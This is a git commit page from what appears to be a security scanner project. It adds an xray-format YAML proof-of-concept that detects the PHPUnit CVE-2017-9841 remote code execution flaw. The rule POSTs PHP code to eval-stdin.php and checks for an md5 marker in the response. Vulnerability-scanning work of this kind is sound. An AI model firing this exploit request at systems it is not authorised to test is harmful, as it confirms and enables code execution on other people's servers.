优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
@@ -0,0 +1,13 @@
name: poc-yaml-phpunit-cve-2017-9841-rce
set:
rand: randomInt(2000000000, 2100000000)
rules:
- method: POST
path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
body: <?=print(md5({{rand}}));?>
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: p0wd3r,buchixifan
links:
- https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841